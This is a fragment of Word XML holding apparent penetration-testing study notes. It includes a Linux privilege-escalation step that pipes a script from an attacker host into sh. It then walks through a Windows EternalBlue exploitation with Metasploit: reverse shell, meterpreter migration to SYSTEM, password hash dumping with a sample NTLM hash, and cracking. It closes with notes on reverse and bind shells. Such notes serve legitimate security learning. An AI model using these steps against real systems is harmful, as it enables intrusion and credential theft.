        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Curl http://&lt;attacker ip:port&gt;/&lt;raw linpea file&gt;.sh | sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380802ED" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enter to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26651192" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Results in privilege escalation script to assist in vuln detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5FCEDB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53219DF3" w14:textId="3201A5F4" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E76388" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Windows and Eternal Blue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E258D6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Run nmap scan – detect ms17-010 eternal blue vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7776CA1A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233448C6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Search, use, set required options and payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D89B30" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Payload: windows/x64/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC65050" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>DOS layout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4203D8AA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>To change to meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289BD62A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Background shell (CTRL + Z)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D73CC04" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>To convert shell to meterpreter shell in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E66AF96" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“post/multi/manage/shell_to_meterpreter”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246AEA55" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Use &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AC7461" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Session fill in required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F97B3D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“sessions” command for active sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF9B05F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Find session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F004D9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Set session #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F6FEF4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9FB5E0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“sessions -i &lt;new #&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5611270B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“shell” command allows return to victim shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B13B493" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Whoami to check user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E035499" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Background to return to meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D172B0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>List processes via ps command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E297C37" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Find NT AUTHORITY\SYSTEM and write down PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288F1F40" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Toward bottom of list for low impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AEA8DA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Migrate to process using “migrate &lt;PID&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68907B6D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Dump non-default users password and crack it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DBE256" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Run command hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5386B9A2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Look at user names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728C6520" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Hashcat hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F105E56" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d::: (NTLM/LM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FFB754" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Crackstation or hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A28B9D4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Separate at :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176DC938" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Also navigate through meterpreter as one would in cmd line to find flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CD3398" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Passwords – C:/indows/system32/config/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00414EA6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>User folders, especially ones ID’d as system owners or admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6472F684" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29681959" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Shells – Sending/Receiving (Reverse/Bind) Shells When Exploiting Target Machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A122B5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Shells are used when interfacing with a Command Line environment (CLI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BD3625" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Such as common bash or sh programs in Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D312B7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Cmd.exe and powershell on windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A81D82F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Possible to sometimes force an application running on the server to execute arbitrary code – use initial access to obtain a shell running on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624F7DE1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Reverse shell – remote server sends command line access to user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9D15DB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bind shell – open up port on server that can be connected to for execution of commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5C225E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689F1F47" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7FCA4C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
